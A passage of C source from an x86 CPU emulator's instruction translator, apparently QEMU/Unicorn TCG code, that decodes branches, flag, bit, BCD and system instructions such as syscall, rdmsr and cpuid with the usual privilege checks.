(s->iopl != 3) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } else { gen_helper_iret_real(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, dflag - 1)); set_cc_op(s, CC_OP_EFLAGS); } } else { gen_helper_iret_protected(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, dflag - 1), tcg_const_i32(tcg_ctx, s->pc - s->cs_base)); set_cc_op(s, CC_OP_EFLAGS); } gen_eob(s); break; case 0xe8: /* call im */ { if (dflag != MO_16) { tval = (int32_t)insn_get(env, s, MO_32); } else { tval = (int16_t)insn_get(env, s, MO_16); } next_eip = s->pc - s->cs_base; tval += next_eip; if (dflag == MO_16) { tval &= 0xffff; } else if (!CODE64(s)) { tval &= 0xffffffff; } tcg_gen_movi_tl(tcg_ctx, s->T0, next_eip); gen_push_v(s, s->T0); gen_bnd_jmp(s); gen_jmp(s, tval); } break; case 0x9a: /* lcall im */ { unsigned int selector, offset; if (CODE64(s)) goto illegal_op; ot = dflag; offset = insn_get(env, s, ot); selector = insn_get(env, s, MO_16); tcg_gen_movi_tl(tcg_ctx, s->T0, selector); tcg_gen_movi_tl(tcg_ctx, s->T1, offset); } goto do_lcall; case 0xe9: /* jmp im */ if (dflag != MO_16) { tval = (int32_t)insn_get(env, s, MO_32); } else { tval = (int16_t)insn_get(env, s, MO_16); } tval += s->pc - s->cs_base; if (dflag == MO_16) { tval &= 0xffff; } else if (!CODE64(s)) { tval &= 0xffffffff; } gen_bnd_jmp(s); gen_jmp(s, tval); break; case 0xea: /* ljmp im */ { unsigned int selector, offset; if (CODE64(s)) goto illegal_op; ot = dflag; offset = insn_get(env, s, ot); selector = insn_get(env, s, MO_16); tcg_gen_movi_tl(tcg_ctx, s->T0, selector); tcg_gen_movi_tl(tcg_ctx, s->T1, offset); } goto do_ljmp; case 0xeb: /* jmp Jb */ tval = (int8_t)insn_get(env, s, MO_8); tval += s->pc - s->cs_base; if (dflag == MO_16) { tval &= 0xffff; } gen_jmp(s, tval); break; case 0x70: /* jcc Jb */ case 0x71: /* jcc Jb */ case 0x72: /* jcc Jb */ case 0x73: /* jcc Jb */ case 0x74: /* jcc Jb */ case 0x75: /* jcc Jb */ case 0x76: /* jcc Jb */ case 0x77: /* jcc Jb */ case 0x78: /* jcc Jb */ case 0x79: /* jcc Jb */ case 0x7a: /* jcc Jb */ case 0x7b: /* jcc Jb */ case 0x7c: /* jcc Jb */ case 0x7d: /* jcc Jb */ case 0x7e: /* jcc Jb */ case 0x7f: /* jcc Jb */ tval = (int8_t)insn_get(env, s, MO_8); goto do_jcc; case 0x180: /* jcc Jv */ case 0x181: /* jcc Jv */ case 0x182: /* jcc Jv */ case 0x183: /* jcc Jv */ case 0x184: /* jcc Jv */ case 0x185: /* jcc Jv */ case 0x186: /* jcc Jv */ case 0x187: /* jcc Jv */ case 0x188: /* jcc Jv */ case 0x189: /* jcc Jv */ case 0x18a: /* jcc Jv */ case 0x18b: /* jcc Jv */ case 0x18c: /* jcc Jv */ case 0x18d: /* jcc Jv */ 
case 0x18e: /* jcc Jv */ case 0x18f: /* jcc Jv */ if (dflag != MO_16) { tval = (int32_t)insn_get(env, s, MO_32); } else { tval = (int16_t)insn_get(env, s, MO_16); } do_jcc: next_eip = s->pc - s->cs_base; tval += next_eip; if (dflag == MO_16) { tval &= 0xffff; } gen_bnd_jmp(s); gen_jcc(s, b, tval, next_eip); break; case 0x190: /* setcc Gv */ case 0x191: /* setcc Gv */ case 0x192: /* setcc Gv */ case 0x193: /* setcc Gv */ case 0x194: /* setcc Gv */ case 0x195: /* setcc Gv */ case 0x196: /* setcc Gv */ case 0x197: /* setcc Gv */ case 0x198: /* setcc Gv */ case 0x199: /* setcc Gv */ case 0x19a: /* setcc Gv */ case 0x19b: /* setcc Gv */ case 0x19c: /* setcc Gv */ case 0x19d: /* setcc Gv */ case 0x19e: /* setcc Gv */ case 0x19f: /* setcc Gv */ modrm = x86_ldub_code(env, s); gen_setcc1(s, b, s->T0); gen_ldst_modrm(env, s, modrm, MO_8, OR_TMP0, 1); break; case 0x140: /* cmov Gv, Ev */ case 0x141: /* cmov Gv, Ev */ case 0x142: /* cmov Gv, Ev */ case 0x143: /* cmov Gv, Ev */ case 0x144: /* cmov Gv, Ev */ case 0x145: /* cmov Gv, Ev */ case 0x146: /* cmov Gv, Ev */ case 0x147: /* cmov Gv, Ev */ case 0x148: /* cmov Gv, Ev */ case 0x149: /* cmov Gv, Ev */ case 0x14a: /* cmov Gv, Ev */ case 0x14b: /* cmov Gv, Ev */ case 0x14c: /* cmov Gv, Ev */ case 0x14d: /* cmov Gv, Ev */ case 0x14e: /* cmov Gv, Ev */ case 0x14f: /* cmov Gv, Ev */ if (!(s->cpuid_features & CPUID_CMOV)) { goto illegal_op; } ot = dflag; modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; gen_cmovcc1(env, s, ot, b, modrm, reg); break; /************************/ /* flags */ case 0x9c: /* pushf */ gen_svm_check_intercept(s, pc_start, SVM_EXIT_PUSHF); if (s->vm86 && s->iopl != 3) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } else { gen_update_cc_op(s); gen_helper_read_eflags(tcg_ctx, s->T0, tcg_ctx->cpu_env); gen_push_v(s, s->T0); } break; case 0x9d: /* popf */ gen_svm_check_intercept(s, pc_start, SVM_EXIT_POPF); if (s->vm86 && s->iopl != 3) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } else { ot = gen_pop_T0(s); if (s->cpl == 0) { if (dflag != MO_16) { gen_helper_write_eflags(tcg_ctx, tcg_ctx->cpu_env, s->T0, tcg_const_i32(tcg_ctx, (TF_MASK | AC_MASK | ID_MASK | NT_MASK | IF_MASK | IOPL_MASK))); } else { gen_helper_write_eflags(tcg_ctx, tcg_ctx->cpu_env, s->T0, tcg_const_i32(tcg_ctx, (TF_MASK | AC_MASK | ID_MASK | NT_MASK | IF_MASK | IOPL_MASK) & 0xffff)); } } else { if (s->cpl <= s->iopl) { if (dflag != MO_16) { gen_helper_write_eflags(tcg_ctx, tcg_ctx->cpu_env, s->T0, tcg_const_i32(tcg_ctx, (TF_MASK | AC_MASK | ID_MASK | NT_MASK | IF_MASK))); } else { gen_helper_write_eflags(tcg_ctx, tcg_ctx->cpu_env, s->T0, tcg_const_i32(tcg_ctx, (TF_MASK | AC_MASK | ID_MASK | NT_MASK | IF_MASK) & 0xffff)); } } else { if (dflag != MO_16) { gen_helper_write_eflags(tcg_ctx, tcg_ctx->cpu_env, s->T0, tcg_const_i32(tcg_ctx, (TF_MASK | AC_MASK | ID_MASK | NT_MASK))); } else { gen_helper_write_eflags(tcg_ctx, tcg_ctx->cpu_env, s->T0, tcg_const_i32(tcg_ctx, (TF_MASK | AC_MASK | ID_MASK | NT_MASK) & 0xffff)); } } } gen_pop_update(s, ot); set_cc_op(s, CC_OP_EFLAGS); /* abort translation because TF/AC flag may change */ gen_jmp_im(s, s->pc - s->cs_base); gen_eob(s); } break; case 0x9e: /* sahf */ if (CODE64(s) && !(s->cpuid_ext3_features & CPUID_EXT3_LAHF_LM)) goto illegal_op; gen_op_mov_v_reg(s, MO_8, s->T0, R_AH); gen_compute_eflags(s); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_src, CC_O); tcg_gen_andi_tl(tcg_ctx, s->T0, s->T0, CC_S | CC_Z | CC_A | CC_P | CC_C); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_cc_src, 
tcg_ctx->cpu_cc_src, s->T0); break; case 0x9f: /* lahf */ if (CODE64(s) && !(s->cpuid_ext3_features & CPUID_EXT3_LAHF_LM)) goto illegal_op; gen_compute_eflags(s); /* Note: gen_compute_eflags() only gives the condition codes */ tcg_gen_ori_tl(tcg_ctx, s->T0, tcg_ctx->cpu_cc_src, 0x02); gen_op_mov_reg_v(s, MO_8, R_AH, s->T0); break; case 0xf5: /* cmc */ gen_compute_eflags(s); tcg_gen_xori_tl(tcg_ctx, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_src, CC_C); break; case 0xf8: /* clc */ gen_compute_eflags(s); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_src, ~CC_C); break; case 0xf9: /* stc */ gen_compute_eflags(s); tcg_gen_ori_tl(tcg_ctx, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_src, CC_C); break; case 0xfc: /* cld */ tcg_gen_movi_i32(tcg_ctx, s->tmp2_i32, 1); tcg_gen_st_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, offsetof(CPUX86State, df)); break; case 0xfd: /* std */ tcg_gen_movi_i32(tcg_ctx, s->tmp2_i32, -1); tcg_gen_st_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, offsetof(CPUX86State, df)); break; /************************/ /* bit operations */ case 0x1ba: /* bt/bts/btr/btc Gv, im */ ot = dflag; modrm = x86_ldub_code(env, s); op = (modrm >> 3) & 7; mod = (modrm >> 6) & 3; rm = (modrm & 7) | REX_B(s); if (mod != 3) { s->rip_offset = 1; gen_lea_modrm(env, s, modrm); if (!(s->prefix & PREFIX_LOCK)) { gen_op_ld_v(s, ot, s->T0, s->A0); } } else { gen_op_mov_v_reg(s, ot, s->T0, rm); } /* load shift */ val = x86_ldub_code(env, s); tcg_gen_movi_tl(tcg_ctx, s->T1, val); if (op < 4) goto unknown_op; op -= 4; goto bt_op; case 0x1a3: /* bt Gv, Ev */ op = 0; goto do_btx; case 0x1ab: /* bts */ op = 1; goto do_btx; case 0x1b3: /* btr */ op = 2; goto do_btx; case 0x1bb: /* btc */ op = 3; do_btx: ot = dflag; modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; mod = (modrm >> 6) & 3; rm = (modrm & 7) | REX_B(s); gen_op_mov_v_reg(s, MO_32, s->T1, reg); if (mod != 3) { AddressParts a = gen_lea_modrm_0(env, s, modrm); /* specific case: we need to add a displacement */ gen_exts(tcg_ctx, ot, s->T1); tcg_gen_sari_tl(tcg_ctx, s->tmp0, s->T1, 3 + ot); tcg_gen_shli_tl(tcg_ctx, s->tmp0, s->tmp0, ot); tcg_gen_add_tl(tcg_ctx, s->A0, gen_lea_modrm_1(s, a), s->tmp0); gen_lea_v_seg(s, s->aflag, s->A0, a.def_seg, s->override); if (!(s->prefix & PREFIX_LOCK)) { gen_op_ld_v(s, ot, s->T0, s->A0); } } else { gen_op_mov_v_reg(s, ot, s->T0, rm); } bt_op: tcg_gen_andi_tl(tcg_ctx, s->T1, s->T1, (1 << (3 + ot)) - 1); tcg_gen_movi_tl(tcg_ctx, s->tmp0, 1); tcg_gen_shl_tl(tcg_ctx, s->tmp0, s->tmp0, s->T1); if (s->prefix & PREFIX_LOCK) { switch (op) { case 0: /* bt */ /* Needs no atomic ops; we suppressed the normal memory load for LOCK above so do it now. */ gen_op_ld_v(s, ot, s->T0, s->A0); break; case 1: /* bts */ tcg_gen_atomic_fetch_or_tl(tcg_ctx, s->T0, s->A0, s->tmp0, s->mem_index, ot | MO_LE); break; case 2: /* btr */ tcg_gen_not_tl(tcg_ctx, s->tmp0, s->tmp0); tcg_gen_atomic_fetch_and_tl(tcg_ctx, s->T0, s->A0, s->tmp0, s->mem_index, ot | MO_LE); break; default: case 3: /* btc */ tcg_gen_atomic_fetch_xor_tl(tcg_ctx, s->T0, s->A0, s->tmp0, s->mem_index, ot | MO_LE); break; } tcg_gen_shr_tl(tcg_ctx, s->tmp4, s->T0, s->T1); } else { tcg_gen_shr_tl(tcg_ctx, s->tmp4, s->T0, s->T1); switch (op) { case 0: /* bt */ /* Data already loaded; nothing to do.
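T0 was filled by the explicit load (or register move) above; only the CC update further down remains.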
*/ break; case 1: /* bts */ tcg_gen_or_tl(tcg_ctx, s->T0, s->T0, s->tmp0); break; case 2: /* btr */ tcg_gen_andc_tl(tcg_ctx, s->T0, s->T0, s->tmp0); break; default: case 3: /* btc */ tcg_gen_xor_tl(tcg_ctx, s->T0, s->T0, s->tmp0); break; } if (op != 0) { if (mod != 3) { gen_op_st_v(s, ot, s->T0, s->A0); } else { gen_op_mov_reg_v(s, ot, rm, s->T0); } } } /* Delay all CC updates until after the store above. Note that C is the result of the test, Z is unchanged, and the others are all undefined. */ switch (s->cc_op) { case CC_OP_MULB: case CC_OP_MULW: case CC_OP_MULL: case CC_OP_MULQ: case CC_OP_ADDB: case CC_OP_ADDW: case CC_OP_ADDL: case CC_OP_ADDQ: case CC_OP_ADCB: case CC_OP_ADCW: case CC_OP_ADCL: case CC_OP_ADCQ: case CC_OP_SUBB: case CC_OP_SUBW: case CC_OP_SUBL: case CC_OP_SUBQ: case CC_OP_SBBB: case CC_OP_SBBW: case CC_OP_SBBL: case CC_OP_SBBQ: case CC_OP_LOGICB: case CC_OP_LOGICW: case CC_OP_LOGICL: case CC_OP_LOGICQ: case CC_OP_INCB: case CC_OP_INCW: case CC_OP_INCL: case CC_OP_INCQ: case CC_OP_DECB: case CC_OP_DECW: case CC_OP_DECL: case CC_OP_DECQ: case CC_OP_SHLB: case CC_OP_SHLW: case CC_OP_SHLL: case CC_OP_SHLQ: case CC_OP_SARB: case CC_OP_SARW: case CC_OP_SARL: case CC_OP_SARQ: case CC_OP_BMILGB: case CC_OP_BMILGW: case CC_OP_BMILGL: case CC_OP_BMILGQ: /* Z was going to be computed from the non-zero status of CC_DST. We can get that same Z value (and the new C value) by leaving CC_DST alone, setting CC_SRC, and using a CC_OP_SAR of the same width. */ tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s->tmp4); set_cc_op(s, ((s->cc_op - CC_OP_MULB) & 3) + CC_OP_SARB); break; default: /* Otherwise, generate EFLAGS and replace the C bit. */ gen_compute_eflags(s); tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_src, s->tmp4, ctz32(CC_C), 1); break; } break; case 0x1bc: /* bsf / tzcnt */ case 0x1bd: /* bsr / lzcnt */ ot = dflag; modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); gen_extu(tcg_ctx, ot, s->T0); /* Note that lzcnt and tzcnt are in different extensions. */ if ((prefixes & PREFIX_REPZ) && (b & 1 ? s->cpuid_ext3_features & CPUID_EXT3_ABM : s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI1)) { int size = 8 << ot; /* For lzcnt/tzcnt, C bit is defined related to the input. */ tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s->T0); if (b & 1) { /* For lzcnt, reduce the target_ulong result by the number of zeros that we expect to find at the top. */ tcg_gen_clzi_tl(tcg_ctx, s->T0, s->T0, TARGET_LONG_BITS); tcg_gen_subi_tl(tcg_ctx, s->T0, s->T0, TARGET_LONG_BITS - size); } else { /* For tzcnt, a zero input must return the operand size. */ tcg_gen_ctzi_tl(tcg_ctx, s->T0, s->T0, size); } /* For lzcnt/tzcnt, Z bit is defined related to the result. */ gen_op_update1_cc(s); set_cc_op(s, CC_OP_BMILGB + ot); } else { /* For bsr/bsf, only the Z bit is defined and it is related to the input and not the result. */ tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0); set_cc_op(s, CC_OP_LOGICB + ot); /* ??? The manual says that the output is undefined when the input is zero, but real hardware leaves it unchanged, and real programs appear to depend on that. Accomplish this by passing the output as the value to return upon zero. */ if (b & 1) { /* For bsr, return the bit index of the first 1 bit, not the count of leading zeros. 
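The two XORs with TARGET_LONG_BITS - 1 convert the leading-zero count into a bit index: for x != 0, index = (TARGET_LONG_BITS - 1) - clz(x), and XOR coincides with that subtraction because TARGET_LONG_BITS - 1 is an all-ones mask; for x == 0 the pre-XORed register value falls through clz as the fallback and the final XOR restores it.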
*/ tcg_gen_xori_tl(tcg_ctx, s->T1, tcg_ctx->cpu_regs[reg], TARGET_LONG_BITS - 1); tcg_gen_clz_tl(tcg_ctx, s->T0, s->T0, s->T1); tcg_gen_xori_tl(tcg_ctx, s->T0, s->T0, TARGET_LONG_BITS - 1); } else { tcg_gen_ctz_tl(tcg_ctx, s->T0, s->T0, tcg_ctx->cpu_regs[reg]); } } gen_op_mov_reg_v(s, ot, reg, s->T0); break; /************************/ /* bcd */ case 0x27: /* daa */ if (CODE64(s)) goto illegal_op; gen_update_cc_op(s); gen_helper_daa(tcg_ctx, tcg_ctx->cpu_env); set_cc_op(s, CC_OP_EFLAGS); break; case 0x2f: /* das */ if (CODE64(s)) goto illegal_op; gen_update_cc_op(s); gen_helper_das(tcg_ctx, tcg_ctx->cpu_env); set_cc_op(s, CC_OP_EFLAGS); break; case 0x37: /* aaa */ if (CODE64(s)) goto illegal_op; gen_update_cc_op(s); gen_helper_aaa(tcg_ctx, tcg_ctx->cpu_env); set_cc_op(s, CC_OP_EFLAGS); break; case 0x3f: /* aas */ if (CODE64(s)) goto illegal_op; gen_update_cc_op(s); gen_helper_aas(tcg_ctx, tcg_ctx->cpu_env); set_cc_op(s, CC_OP_EFLAGS); break; case 0xd4: /* aam */ if (CODE64(s)) goto illegal_op; val = x86_ldub_code(env, s); if (val == 0) { gen_exception(s, EXCP00_DIVZ, pc_start - s->cs_base); } else { gen_helper_aam(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, val)); set_cc_op(s, CC_OP_LOGICB); } break; case 0xd5: /* aad */ if (CODE64(s)) goto illegal_op; val = x86_ldub_code(env, s); gen_helper_aad(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, val)); set_cc_op(s, CC_OP_LOGICB); break; /************************/ /* misc */ case 0x90: /* nop */ /* XXX: correct lock test for all insn */ if (prefixes & PREFIX_LOCK) { goto illegal_op; } /* If REX_B is set, then this is xchg eax, r8d, not a nop. */ if (REX_B(s)) { goto do_xchg_reg_eax; } if (prefixes & PREFIX_REPZ) { gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_helper_pause(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, s->pc - pc_start)); s->base.is_jmp = DISAS_NORETURN; } break; case 0x9b: /* fwait */ if ((s->flags & (HF_MP_MASK | HF_TS_MASK)) == (HF_MP_MASK | HF_TS_MASK)) { gen_exception(s, EXCP07_PREX, pc_start - s->cs_base); } else { gen_helper_fwait(tcg_ctx, tcg_ctx->cpu_env); } break; case 0xcc: /* int3 */ gen_interrupt(s, EXCP03_INT3, pc_start - s->cs_base, s->pc - s->cs_base); break; case 0xcd: /* int N */ val = x86_ldub_code(env, s); if (s->vm86 && s->iopl != 3) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } else { gen_interrupt(s, val, pc_start - s->cs_base, s->pc - s->cs_base); } break; case 0xce: /* into */ if (CODE64(s)) goto illegal_op; gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_helper_into(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, s->pc - pc_start)); break; #ifdef WANT_ICEBP case 0xf1: /* icebp (undocumented, exits to external debugger) */ gen_svm_check_intercept(s, pc_start, SVM_EXIT_ICEBP); gen_debug(s, pc_start - s->cs_base); break; #endif case 0xfa: /* cli */ if (!s->vm86) { if (s->cpl <= s->iopl) { gen_helper_cli(tcg_ctx, tcg_ctx->cpu_env); } else { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } } else { if (s->iopl == 3) { gen_helper_cli(tcg_ctx, tcg_ctx->cpu_env); } else { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } } break; case 0xfb: /* sti */ if (s->vm86 ? 
s->iopl == 3 : s->cpl <= s->iopl) { gen_helper_sti(tcg_ctx, tcg_ctx->cpu_env); /* interrupts are recognized only after the first insn following sti */ gen_jmp_im(s, s->pc - s->cs_base); gen_eob_inhibit_irq(s, true); } else { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } break; case 0x62: /* bound */ if (CODE64(s)) goto illegal_op; ot = dflag; modrm = x86_ldub_code(env, s); reg = (modrm >> 3) & 7; mod = (modrm >> 6) & 3; if (mod == 3) goto illegal_op; gen_op_mov_v_reg(s, ot, s->T0, reg); gen_lea_modrm(env, s, modrm); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); if (ot == MO_16) { gen_helper_boundw(tcg_ctx, tcg_ctx->cpu_env, s->A0, s->tmp2_i32); } else { gen_helper_boundl(tcg_ctx, tcg_ctx->cpu_env, s->A0, s->tmp2_i32); } break; case 0x1c8: /* bswap reg */ case 0x1c9: /* bswap reg */ case 0x1ca: /* bswap reg */ case 0x1cb: /* bswap reg */ case 0x1cc: /* bswap reg */ case 0x1cd: /* bswap reg */ case 0x1ce: /* bswap reg */ case 0x1cf: /* bswap reg */ reg = (b & 7) | REX_B(s); #ifdef TARGET_X86_64 if (dflag == MO_64) { gen_op_mov_v_reg(s, MO_64, s->T0, reg); tcg_gen_bswap64_i64(tcg_ctx, s->T0, s->T0); gen_op_mov_reg_v(s, MO_64, reg, s->T0); } else #endif if (dflag == MO_32) { gen_op_mov_v_reg(s, MO_32, s->T0, reg); tcg_gen_ext32u_tl(tcg_ctx, s->T0, s->T0); tcg_gen_bswap32_tl(tcg_ctx, s->T0, s->T0); gen_op_mov_reg_v(s, MO_32, reg, s->T0); } else { tcg_gen_movi_tl(tcg_ctx, s->T0, 0); gen_op_mov_reg_v(s, MO_16, reg, s->T0); } break; case 0xd6: /* salc */ if (CODE64(s)) goto illegal_op; gen_compute_eflags_c(s, s->T0); tcg_gen_neg_tl(tcg_ctx, s->T0, s->T0); gen_op_mov_reg_v(s, MO_8, R_EAX, s->T0); break; case 0xe0: /* loopnz */ case 0xe1: /* loopz */ case 0xe2: /* loop */ case 0xe3: /* jecxz */ { TCGLabel *l1, *l2, *l3; tval = (int8_t)insn_get(env, s, MO_8); next_eip = s->pc - s->cs_base; tval += next_eip; if (dflag == MO_16) { tval &= 0xffff; } l1 = gen_new_label(tcg_ctx); l2 = gen_new_label(tcg_ctx); l3 = gen_new_label(tcg_ctx); b &= 3; switch(b) { case 0: /* loopnz */ case 1: /* loopz */ gen_op_add_reg_im(s, s->aflag, R_ECX, -1); gen_op_jz_ecx(s, s->aflag, l3); gen_jcc1(s, (JCC_Z << 1) | (b ^ 1), l1); break; case 2: /* loop */ gen_op_add_reg_im(s, s->aflag, R_ECX, -1); gen_op_jnz_ecx(s, s->aflag, l1); break; default: case 3: /* jcxz */ gen_op_jz_ecx(s, s->aflag, l1); break; } gen_set_label(tcg_ctx, l3); gen_jmp_im(s, next_eip); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); gen_jmp_im(s, tval); gen_set_label(tcg_ctx, l2); gen_eob(s); } break; case 0x130: /* wrmsr */ case 0x132: /* rdmsr */ if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } else { gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); if (b & 2) { gen_helper_rdmsr(tcg_ctx, tcg_ctx->cpu_env); } else { gen_helper_wrmsr(tcg_ctx, tcg_ctx->cpu_env); } } break; case 0x131: /* rdtsc */ gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_helper_rdtsc(tcg_ctx, tcg_ctx->cpu_env); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_jmp(s, s->pc - s->cs_base); } break; case 0x133: /* rdpmc */ gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_helper_rdpmc(tcg_ctx, tcg_ctx->cpu_env); break; case 0x134: /* sysenter */ /* For Intel SYSENTER is valid on 64-bit */ if (CODE64(s) && env->cpuid_vendor1 != CPUID_VENDOR_INTEL_1) goto illegal_op; if (!s->pe) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } else { TCGv_i32 addend = tcg_const_i32(tcg_ctx, s->pc - pc_start); gen_helper_sysenter(tcg_ctx, tcg_ctx->cpu_env,
addend); gen_eob(s); tcg_temp_free_i32(tcg_ctx, addend); } break; case 0x135: /* sysexit */ /* For Intel SYSEXIT is valid on 64-bit */ if (CODE64(s) && env->cpuid_vendor1 != CPUID_VENDOR_INTEL_1) goto illegal_op; if (!s->pe) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } else { gen_helper_sysexit(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, dflag - 1)); gen_eob(s); } break; #ifdef TARGET_X86_64 case 0x105: /* syscall */ /* XXX: is it usable in real mode ? */ gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_helper_syscall(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, s->pc - pc_start)); /* TF handling for the syscall insn is different. The TF bit is checked after the syscall insn completes. This allows #DB to not be generated after one has entered CPL0 if TF is set in FMASK. */ gen_eob_worker(s, false, true); break; case 0x107: /* sysret */ if (!s->pe) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } else { gen_helper_sysret(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, dflag - 1)); /* condition codes are modified only in long mode */ if (s->lma) { set_cc_op(s, CC_OP_EFLAGS); } /* TF handling for the sysret insn is different. The TF bit is checked after the sysret insn completes. This allows #DB to be generated "as if" the syscall insn in userspace has just completed. */ gen_eob_worker(s, false, true); } break; #endif case 0x1a2: /* cpuid */ gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_helper_cpuid(tcg_ctx, tcg_ctx->cpu_env); break; case 0xf4: /* hlt */ if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } else { gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_helper_hlt(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, s->pc - pc_start)); s->base.is_jmp = DISAS_NORETURN; } break; case 0x100: modrm = x86_ldub_code(env, s); mod = (modrm >> 6) & 3; op = (modrm >> 3) & 7; switch(op) { case 0: /* sldt */ if (!s->pe || s->vm86) goto illegal_op; gen_svm_check_intercept(s, pc_start, SVM_EXIT_LDTR_READ); tcg_gen_ld32u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, ldt.selector)); ot = mod == 3 ? dflag : MO_16; gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 1); break; case 2: /* lldt */ if (!s->pe || s->vm86) goto illegal_op; if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } else { gen_svm_check_intercept(s, pc_start, SVM_EXIT_LDTR_WRITE); gen_ldst_modrm(env, s, modrm, MO_16, OR_TMP0, 0); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); gen_helper_lldt(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32); } break; case 1: /* str */ if (!s->pe || s->vm86) goto illegal_op; gen_svm_check_intercept(s, pc_start, SVM_EXIT_TR_READ); tcg_gen_ld32u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, tr.selector)); ot = mod == 3 ? 
dflag : MO_16; gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 1); break; case 3: /* ltr */ if (!s->pe || s->vm86) goto illegal_op; if (s->cpl != 0) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } else { gen_svm_check_intercept(s, pc_start, SVM_EXIT_TR_WRITE); gen_ldst_modrm(env, s, modrm, MO_16, OR_TMP0, 0); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); gen_helper_ltr(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32); } break; case 4: /* verr */ case 5: /* verw */ if (!s->pe || s->vm86) goto illegal_op; gen_ldst_modrm(env, s, modrm, MO_16, OR_TMP0, 0); gen_update_cc_op(s); if (op == 4) { gen_helper_verr(tcg_ctx, tcg_ctx->cpu_env, s->T0); } else { gen_helper_verw(tcg_ctx, tcg_ctx->cpu_env, s->T0); } set_cc_op(s, CC_OP_EFLAGS); break; default: goto unknown_op; } break; case 0x101: modrm = x86_ldub_code(env, s); switch (modrm) { CASE_MODRM_MEM_OP(0): /* sgdt */ gen_svm_check_intercept(s, pc_start, SVM_EXIT_GDTR_READ); gen_lea_modrm(env, s, modrm); tcg_gen_ld32u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, gdt.limit)); gen_op_st_v(s, MO_16, s->T0, s->A0); gen_add_A0_im(s, 2); tcg_gen_ld_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, gdt.base)); if (dflag == MO_16) { tcg_gen_andi_tl(tcg_ctx, s->T0, s->T0, 0xffffff); } gen_op_st_v(s, CODE64(s) + MO_32, s->T0, s->A0); break; case 0xc8: /* monitor */ if (!(s->cpuid_ext_features & CPUID_EXT_MONITOR) || s->cpl != 0) { goto illegal_op; } gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); tcg_gen_mov_tl(tcg_ctx, s->A0, tcg_ctx->cpu_regs[R_EAX]); gen_extu(tcg_ctx, s->aflag, s->A0); gen_add_A0_ds_seg(s); gen_helper_monitor(tcg_ctx, tcg_ctx->cpu_env, s->A0); break; case 0xc9: /* mwait */ if (!(s->cpuid_ext_features & CPUID_EXT_MONITOR) || s->cpl != 0) { goto illegal_op; } gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); 